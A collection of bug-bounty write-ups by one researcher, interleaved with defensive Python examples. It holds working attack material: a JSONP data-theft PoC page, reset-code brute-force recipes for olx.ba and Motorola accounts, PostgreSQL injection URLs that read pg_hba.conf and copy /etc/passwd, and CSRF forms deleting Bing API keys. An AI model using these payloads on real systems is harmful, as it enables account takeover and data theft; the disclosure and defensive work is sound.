1. https://medium.com/@maxon3/reflected-dom-xss-and-clickjacking-on-https-silvergoldbull-de-bt-html-daa36bdf7bf0

  3. JSONP wraps a JSON response in a JavaScript function call and sends it back to the browser as a script. A script is not subject to the Same Origin Policy, and when it is loaded into the client the callback receives the JSON object it wraps.

    In general, the Same Origin Policy states that if the protocol (e.g. http), port (e.g. 80) or host (e.g. example.com) differs from the origin that is requesting the data, access should not be permitted.

    But the HTML <script> element is allowed to retrieve content from foreign origins.


    So let's talk about a vulnerability inside a popular social network in the USA, with more than a million users per day. Users can set images to private, aka "Only me", but thanks to JSONP, whenever a user visits his album a request is sent to the API and the image links are wrapped in a callback function, like this:

    http://api.example.com/photoselect?callback=userPhotos

    with the response type set to application/javascript.

    Thanks to the <script> element's freedom from the SOP we can hijack this info and see private images. Let's see what response we get:
    userPhotos({"imageData":[{"imageId":617115519,"miniPath":"thumb_userimages\/mini\/2015\/11\/06\/1306\/thm_phpaebstx.jpg"},{"imageId":787725877,"miniPath":"thumb_userimages\/mini\/2016\/11\/15\/0706\/thm_phpa9iRVR.png"},{"imageId":539201026,"miniPath":"thumb_userimages\/mini\/2015\/02\/05\/15\/thm_php7DuF7V.jpg"},{"imageId":450159923,"miniPath":"thumb_userimages\/mini\/2014\/04\/16\/17\/thm_phpnYEEgn.png"},{"imageId":439606407,"miniPath":"thumb_userimages\/mini\/2014\/03\/13\/09\/thm_php6f9wmz.jpg"}],"success":true});



    So we get the ids of the images and their locations on the server. Now let's make an exploit PoC.

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="utf-8">
        <title>User images information leak PoC</title>
    </head>
    <body>
        <h1>User images information leak PoC</h1>
        <h2>Link for user images:</h2>
        <pre id="output">Loading…</pre>
        <script>
            // JSONP callback: the API wraps the victim's album data in a call to this
            // function, so the data arrives here as an ordinary JavaScript object.
            function hijackData(data) {
                var formatted = JSON.stringify(data, undefined, 2);
                // textContent shows the raw JSON instead of interpreting it as HTML.
                document.getElementById('output').textContent = formatted;
            }
        </script>
        <!-- Cross-origin script load; the browser attaches the victim's cookies to it. -->
        <script src="http://api.example.com/photoselect?callback=hijackData"></script>
    </body>
    </html>

    The result when the victim visits the page:




    So thanks to JSONP and <script> we can get links to private user images if the victim visits our page. Steps:
    1. The user visits our page.
    2. Our page uses <script> to send a request to the site's API with our callback function.
    3. The API responds with image ids and image links.
    4. We use JSON.stringify to format the reply and write it into the page.
    5. The user's images are hijacked.
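    As an added example (not code from the original post or from the affected site), here is how a JSONP endpoint can avoid this leak: the callback name is allow-listed, and any data that depends on the caller's session is only ever served as plain JSON, which a cross-site <script> tag can load but not read. The album data and names are constructed for the example.

```python
import json
import re

# Allow-list for the callback name: a JavaScript identifier, optionally dotted.
# Anything else (e.g. "alert(1);//") is rejected instead of being echoed into script.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Constructed stand-in for the photoselect API's data; "private" models an "Only me" album.
ALBUMS = {
    "public": {"imageData": [{"imageId": 101, "miniPath": "thumb/pub.jpg"}], "success": True},
    "private": {"imageData": [{"imageId": 202, "miniPath": "thumb/priv.jpg"}], "success": True},
}
JSON_HEADERS = {"Content-Type": "application/json", "X-Content-Type-Options": "nosniff"}
JSONP_HEADERS = {"Content-Type": "application/javascript", "X-Content-Type-Options": "nosniff"}

def photoselect(album, callback=None, session_user=None):
    """Return (status, headers, body) for GET /photoselect?callback=...

    Rule enforced: data that depends on the caller's session is only ever returned as
    plain JSON. A cross-site <script src=...> can execute a function-call wrapper but
    cannot read a bare JSON body, so the wrapper is exactly what leaked the private album.
    """
    if album not in ALBUMS:
        return 404, JSON_HEADERS, json.dumps({"success": False, "error": "no such album"})
    is_private = album == "private"
    if is_private and session_user is None:
        return 401, JSON_HEADERS, json.dumps({"success": False, "error": "login required"})
    if callback is None:
        return 200, JSON_HEADERS, json.dumps(ALBUMS[album])
    if is_private:
        # Refuse loudly rather than silently ignoring the callback, so client developers
        # notice that authenticated data must be fetched with XHR/fetch, not <script>.
        return 403, JSON_HEADERS, json.dumps({"success": False, "error": "JSONP not allowed for private data"})
    if not CALLBACK_RE.match(callback):
        return 400, JSON_HEADERS, json.dumps({"success": False, "error": "invalid callback"})
    # Public data may be wrapped. The leading comment keeps attacker-chosen bytes out of
    # the first position of the response, which some content-sniffing abuses rely on.
    return 200, JSONP_HEADERS, "/**/" + callback + "(" + json.dumps(ALBUMS[album]) + ");"
```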


    Let's talk about the fix:

  4. Olx.ba (formerly pik.ba) is the largest buy-and-sell network in Bosnia and Herzegovina and the most visited site in the country. Some of the figures:

    – OLX.ba is visited by more than 500,000 visitors a day;
    – Monthly page views exceed 700 million;
    – More than 5 million devices visit OLX each month;
    – Each visitor opens more than 40 pages per visit on average;
    – More than 40,000 new items are posted each day on average;
    – The buy-and-sell community grows by more than 800 new users every day;

    Although the site's administration takes care of user security, flaws still exist, and today we will talk about a very serious one that allows an attacker to take over your olx.ba account. We will split this attack into a few steps.

    1. Triggering the password reset

    The first phase is triggering the password reset, and for that we need either the user's email or the phone number registered on olx.ba.




    Unfortunately the email will often not be available to us, but the phone number is visible on many olx.ba accounts: when you visit a user's account, on the right side there is an option to view the phone number.


    Now that we have the phone number, we enter it into the password reset form field and click "Pošalji novu šifru" ("Send new password"). If you do this, the recommendation is to do it late in the evening, when there is less chance that the user will react to the password reset message.

    2. Discovering the reset password through the mobile application

    The password the user receives consists only of digits, from 100000 to 999999. This means the attacker will try to find the right reset password and log in to the account. This attack is called brute force, i.e. trying to find the right password by sending every possible combination and reading the server's response. If the password is wrong the server responds one way; if it is correct it responds another way.
    If you try this attack on the web version of olx.ba, after a few attempts the server blocks the attack and prints a message that you have entered the wrong password too many times and should wait a few minutes before trying again. The server detected the attack and the olx.ba website is not vulnerable. Well done to the web developers.

    But if the web application is not vulnerable, is the mobile application protected as well?

    Unfortunately it is not. The problem is that the web application and the mobile application use different endpoints, i.e. data is processed at one location for the web and at another for mobile apps. We will deal with the mobile app endpoint. With some settings on the phone and on the computer we can monitor the requests of the olx.ba Android application.



    Wrong login.



    Correct login.



    The mobile application has no brute force protection, so we can try every reset password combination, arrive at the valid one and take over the user's account. Although brute force takes time, with a few computers or a small network the speed increases.


    Example of brute force with the BurpSuite tool:





    As you can see, request number 1994 is true, which means we found the right login and can now take over the account.

    To summarize:

    1. The attacker enters the victim's email or phone number linked to olx.ba and triggers a password reset.
    2. A reset password consisting of 6 digits from 100000 to 999999 is generated.
    3. The attacker uses brute force to find the right password and log in to the victim's account.
    4. Once the right password is found, the attacker can take over the victim's account.

    My advice is to set your phone numbers on olx.ba to private so that only you can see them.
    Advice for the olx.ba administration: use a mix of digits and letters for the reset password; this will make the attack far harder because the number of possible password permutations will be far larger.

    This flaw was fixed by the olx.ba administration in a very short time. Full credit for their promptness and care for user security.


    Not sure whether your web or mobile application is secure?
    Hire me to check: maxonebt4@gmail.com

    Danijel Maksimovic
    Application Security Analyst





  5. A few months ago I reported an SQL injection inside one of the telekom.de subdomains. The subdomain crp.telekom.de was vulnerable to SQL injection, but I couldn't have exploited it if it weren't for PHP backup files on the server.

    The subdomain was simple, only a login form, and all my attempts to SQL inject that form failed, so I started DirBuster to see if there were some other files. During my reconnaissance phase I found that there was an index.php_old file on the server, and when you visit it you can read the entire PHP code. While reading it I found a MySQL query:


    So I tried and the result:

    A little bit of burp to make better poc:


    Real data extracted:


    And report has been sent:



    The bug was fixed very fast, I got rewarded within a week, and I can say that the telekom.de security team is always great with response time, fixes and rewards. I had some more SQL injections on telekom, so I'll blog more when I find free time.

  6. The Nokia.de subdomains online.shop.de and pos-shop.nokia.de were vulnerable to blind SQL injection.
    This bug was reported to Microsoft on 5/13/2015 and they fixed it by shutting down the subdomains mentioned in this post, and never responded (I got a reply 2 days after this post).

    Acknowledged in December 2015 list:
    https://technet.microsoft.com/en-us/security/cc308589.aspx

    A simple true/false test showed that the app is communicating with a database:

    True:  http://pos-shop.nokia.de/list/8/3 and 1=1 (page loads)
    False:  http://pos-shop.nokia.de/list/8/3 and 1=0 (blank page loads)


    From here it was just the usual blind SQL injection, and since there is the awesome sqlmap tool, the database was compromised:




    But I did play with it without sqlmap, too :D






  7. This is the bug that got me into the Security Researcher Acknowledgments for Microsoft Online Services for May 2015. So let's start.

    The subdomain https://borntolearn.mslearn.net/ is Microsoft's training and certification community, and when you visit your profile page and click the Activity section there is an option to upload some files.



    Most files were treated as attachments, but not video files. So I uploaded an SWF file, which is basically a media file (Flash movie), and it got executed in the browser.


    And it is fixed now.


  8. A little about the company and product:

    ManageEngine simplifies IT management with affordable software that offers the ease of use SMBs need and the powerful features the largest enterprises demand. More than 90,000 companies around the world - including three of every five Fortune 500 companies - trust our products to manage their networks and data centers, business applications, and IT services and security. Another 300,000-plus admins optimize their IT using the free editions of ManageEngine products.

    ManageEngine® Applications Manager is a comprehensive application monitoring software used to monitor heterogeneous business applications such as web applications, application servers, web servers, databases, network services, systems, virtual systems, cloud resources, etc. It provides remote business management to the applications or resources in the network. It is a powerful tool for system and network administrators, helping them monitor any number of applications or services running in the network without much manual effort.

    Now back to business. There is a very dangerous SQL injection that could allow a user to write to the server and eventually overwrite existing scripts, which could lead to remote code execution.

    The vulnerability lies inside the reports generator at this link:

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10[sql injection]
    The company is using the 'postgres' user account by default on demo.appmanager.com.

    I will lead you through how you can exploit this and extract valuable data with error-based injection.

    1. Get the data directory location.
    SHORT EXPL: The "directory where PostgreSQL will keep all databases" (and configuration) is called the "data directory" and corresponds to what PostgreSQL calls (a little confusingly) a "database cluster" (not related to distributed computing; it just means a group of databases and related objects managed by a PostgreSQL server).
    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'and/**/1=cast((SeLeCT current_setting('data_directory')) as int)--





    2. Get the hba file location

    SHORT EXPL: Client authentication is controlled by a configuration file, which traditionally is named pg_hba.conf and is stored in the database cluster's data directory. (HBA stands for host-based authentication.) A default pg_hba.conf file is installed when the data directory is initialized by initdb. It is possible to place the authentication configuration file elsewhere, however; see the hba_file configuration parameter.

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'and/**/1=cast((SeLeCT current_setting('hba_file')) as int)--



    3. Read pg_ident.conf or pg_hba.conf
    SHORT EXPL: Username maps are defined in the ident map file, which by default is named pg_ident.conf and is stored in the cluster's data directory. (It is possible to place the map file elsewhere, however; see the ident_file configuration parameter.)

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'and/**/1=cast((SELECT pg_read_file('pg_hba.conf',0,10000000)) as int)--

    4. Write the list of databases to a writable location:

    NOTE: I decided to write to the flash folder just so that I'm sure I won't overwrite anything important, since there isn't anything important in that folder. You can construct the file path with command 1 or 2 on this list.
    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10';copy (SELECT datname FROM pg_database) to '/home/appmanager/demo/11900/AppManager11/working/flash/databases.txt';--

    5. Write the list of tables to a writable location:

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'; copy (SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)) to '/home/appmanager/demo/11900/AppManager11/working/flash/tables.txt';--

    6. Write the list of columns to a writable location:

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10'; copy (SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')) to '/home/appmanager/demo/11900/AppManager11/working/flash/columns.txt';--

    7. Write the contents of /etc/passwd to a writable location:

    http://site.com/showReports.do?actionMethod=generateIndividualGlanceReport&resid=10';DROP TABLE IF EXISTS mydats;CREATE TABLE mydats(t text); COPY mydats FROM '/etc/passwd'; copy (SELECT t FROM mydats) to '/home/appmanager/demo/11900/AppManager11/working/flash/etcpassw.txt';--


    This vulnerability was reported one month ago, but I don't think they really consider it dangerous.
    One can also write to a JSP file or create a function and escalate this to RCE.
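    As an added example (not the author's or ManageEngine's code), a small Python triage script that flags requests shaped like the payloads above in web-server access logs: it decodes the query string, strips the /**/ comment obfuscation and matches the error-based CAST, current_setting()/pg_read_file() and stacked COPY patterns. The log lines are constructed; the indicator names and the assumed combined log format are mine.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicator patterns modelled on the payload shapes above: error-based CAST of a subquery
# to int, current_setting()/pg_read_file() probes, stacked statements, COPY to/from a file.
INDICATORS = {
    "error_based_cast": re.compile(r"cast\s*\(\s*\(?\s*select\b.*?\bas\s+int\s*\)", re.I | re.S),
    "pg_setting_probe": re.compile(r"current_setting\s*\(", re.I),
    "pg_file_read": re.compile(r"pg_read_file\s*\(", re.I),
    "stacked_query": re.compile(r"'\s*;\s*(copy|create|drop|alter|insert|update|delete)\b", re.I),
    "copy_to_file": re.compile(r"\bcopy\b.*?\bto\s+'[^']+'", re.I | re.S),
    "copy_from_file": re.compile(r"\bcopy\b.*?\bfrom\s+'[^']+'", re.I | re.S),
}
# Combined-log-format prefix (assumed); only the fields used below are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3}')

def normalize(value):
    """Decode twice (double-encoded input), then treat /**/ comments as whitespace."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)

def query_params(query):
    """Split on '&' and the first '=' only; parse_qsl's ';' handling varies by version."""
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        yield name, raw

def classify_request(path):
    """Sorted indicator names found in any query parameter of a request path."""
    found = set()
    for _, raw in query_params(urlsplit(path).query):
        decoded = normalize(raw)
        found.update(label for label, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(found)

def scan_access_log(lines):
    """Yield (client_ip, path, indicators) for every line with at least one indicator."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = classify_request(m.group("path"))
            if hits:
                yield m.group("ip"), m.group("path"), hits

# Constructed sample log: one normal report request, then two shaped like the error-based
# and stacked-COPY payloads above (addresses, timestamps and the output path are made up).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Mar/2016:22:14:01 +0100] "GET /showReports.do?actionMethod=generateIndividualGlanceReport&resid=10 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Mar/2016:22:14:09 +0100] "GET /showReports.do?actionMethod=generateIndividualGlanceReport&resid=10%27and/**/1=cast((SeLeCT%20current_setting(%27data_directory%27))%20as%20int)-- HTTP/1.1" 500 812',
    '203.0.113.7 - - [10/Mar/2016:22:15:30 +0100] "GET /showReports.do?actionMethod=generateIndividualGlanceReport&resid=10%27;copy%20(SELECT%20datname%20FROM%20pg_database)%20to%20%27/tmp/databases.txt%27;-- HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for ip, path, hits in scan_access_log(SAMPLE_LOG):
        print(ip, ",".join(hits), path)
```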

    Danijel Maksimovic @maxon3 
    Bosnia and Herzegovina
    LinkedIn
    maxonebt4@gmail.com



  9. This bug was reported on February 23rd and it was fixed within a few hours, so well done Motorola.

    So this is how it was: a friend of mine sent me a picture that one of his friends posted, where that person got some cool stuff from Motorola; it looked like he got a phone for some serious bug.
    So I thought, why not give it a chance and see what I can find. My first randomly chosen target was membership.motorola.com.

    That day I was reading about a password reset vulnerability on etsy.com, so I decided to test for that bug first.

    First we go to: https://membership.motorola.com/ExtranetRegistration/PasswordReminder.do

    There we can input the user id, which we choose when we register:


    So for this test I registered the user id "kjkszpj" (a popular game cheat code :D) and requested a password reset for that user id.

    After that a URL is sent to the email connected to that user id:
    https://membership.motorola.com/ExtranetRegistration/resetPassword.do?id=kjkszpj&a=[reset code]

    All we need to do now is brute-force the "a" GET parameter in the password reset link, which is the only protection. The POST request params go like this:
    userID=kjkszpj&activationCode=12520113&newPassword=&confirmPassword=&submit.x=49&submit.y=9

    Attack steps :

    1. Initiate a password reset for our account.
    2. Open the password reset link.
    3. Change the "id" value in the reset link to the account we want to hack, and set a new password.
    4. Intercept the reset request in Burp Suite (or any other proxy tool).
    5. Brute-force "activationCode" until you get the right one.
    6. Log in with the new password to the victim's account.



    And the video PoC: https://www.youtube.com/watch?v=tUjsJTHWp_I&feature=youtu.be
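    As an added example (not olx.ba's or Motorola's code), a password-reset code store in Python that closes both gaps described in the olx.ba and Motorola write-ups above: codes are a long mix of letters and digits rather than 100000..999999, bound to the account they were issued for (so swapping the id in the link does nothing), single-use and short-lived, and checked against a per-account attempt counter that every front end, web and mobile API alike, shares. Class and parameter names and the limits are assumptions.

```python
import hmac
import secrets
import string
import time

ALPHABET = string.ascii_letters + string.digits  # letters and digits, not 100000..999999
CODE_LENGTH = 12        # 62**12 possibilities instead of 900000
MAX_ATTEMPTS = 5        # per account, across every front end that can call verify()
CODE_TTL_SECONDS = 15 * 60

class ResetCodeStore:
    """Single store used by both the web site and the mobile API, so the attempt limit
    cannot be bypassed by switching endpoints (the olx.ba gap above)."""

    def __init__(self, now=time.time):
        self.now = now                     # injectable clock, so expiry is testable
        self._pending = {}                 # user_id -> [code, expires_at, attempts_left]

    def issue(self, user_id):
        """Create a fresh code for user_id, replacing any earlier one."""
        code = "".join(secrets.choice(ALPHABET) for _ in range(CODE_LENGTH))
        self._pending[user_id] = [code, self.now() + CODE_TTL_SECONDS, MAX_ATTEMPTS]
        return code

    def verify(self, user_id, code):
        """Return (accepted, reason). The code is looked up by the account it was issued
        for, so changing the user id in the reset link (the Motorola case) cannot work."""
        entry = self._pending.get(user_id)
        if entry is None:
            return False, "no pending reset"
        stored, expires_at, attempts_left = entry
        if self.now() > expires_at:
            del self._pending[user_id]
            return False, "expired"
        if attempts_left <= 0:
            return False, "locked"          # stays locked until a new code is issued
        # compare_digest needs ASCII str on both sides; anything else is simply wrong.
        if isinstance(code, str) and code.isascii() and hmac.compare_digest(stored, code):
            del self._pending[user_id]      # single use
            return True, "ok"
        entry[2] -= 1                       # count the failure for every caller alike
        return False, "wrong code"
```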


  10. A few days ago I was doing some PHP development through some videos, and there was a part that included some code using the Bing Webmaster API, so I had to get an API key.

    So I did some checking and noticed that there was no CSRF token at this location: https://ssl.bing.com/webmaster/home/api.

    It says:

    Lost or Compromised API Key?
    Do not give out your API key to any 3rd party or anyone you do not trust. If you feel the key has been compromised or used by an unauthorized party you can create a new key by deleting your current one and clicking generate. Note that if you delete your key all applications tied with this key will no longer function and need to be updated with the new API key that was generated for you.
    ( http://msdn.microsoft.com/en-us/library/hh969388 )
     
    You could use CSRF to delete or change a user's API key.
    Delete API key:

    <!-- Auto-submitting this form from any page makes the victim's browser send the -->
    <!-- request with the victim's Bing cookies; no token proves it came from the site. -->
    <form id="deleteform" name="delete" action="https://ssl.bing.com/webmaster/svc/Webmaster.svc/DeleteApiKey" method="post" target="maxa">
        <input type="hidden" name="test" value="{}">
        <input type="submit" name="submit" id="delete-submit" value="Delete Key"/>
    </form>
    Generate new API key:
    <form id="changeform" name="change" action="https://ssl.bing.com/webmaster/svc/Webmaster.svc/GenerateApiKey" method="post" target="maxa">
        <input type="hidden" name="test" value="{}">
        <input type="submit" name="submit" id="change-submit" value="Change Key"/>
    </form>


    And that is how I got onto the Microsoft May 2014 Acknowledgment page.
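    As an added example (not Bing's code), the server-side check that would have stopped the two forms above: a state-changing request must carry a token bound to the caller's session and must come from the site's own origin. A page on another origin can make the browser send the victim's cookies, but it can neither read the token nor forge the Origin header. Function names, header handling and the server key are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret; generated here for the example
SITE_ORIGIN = "https://ssl.bing.com"      # the application's own origin (from the post)

def csrf_token(session_id):
    """Token bound to the session: HMAC(server_key, session_id). Stateless to verify,
    and unknowable to a page that cannot read the victim's session id."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def request_origin(headers):
    """Origin header, falling back to the Referer's scheme+host; None if neither is present."""
    if headers.get("Origin"):
        return headers["Origin"]
    if headers.get("Referer"):
        p = urlsplit(headers["Referer"])
        return p.scheme + "://" + p.netloc
    return None

def handle_api_key_change(action, session_id, form, headers):
    """Guard for state-changing endpoints such as DeleteApiKey / GenerateApiKey.

    `form` is the parsed POST body, `headers` the request headers. Both checks must pass:
    a missing Origin/Referer is treated as cross-site, not as trusted.
    """
    if request_origin(headers) != SITE_ORIGIN:
        return 403, "rejected: request did not originate from " + SITE_ORIGIN
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return 403, "rejected: missing or invalid csrf_token"
    return 200, action + " performed"

# Constructed requests: what the forms shown above would send from an attacker's page.
ATTACKER_FORM = {"test": "{}"}
ATTACKER_HEADERS = {"Origin": "https://attacker.example", "Referer": "https://attacker.example/poc.html"}
```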



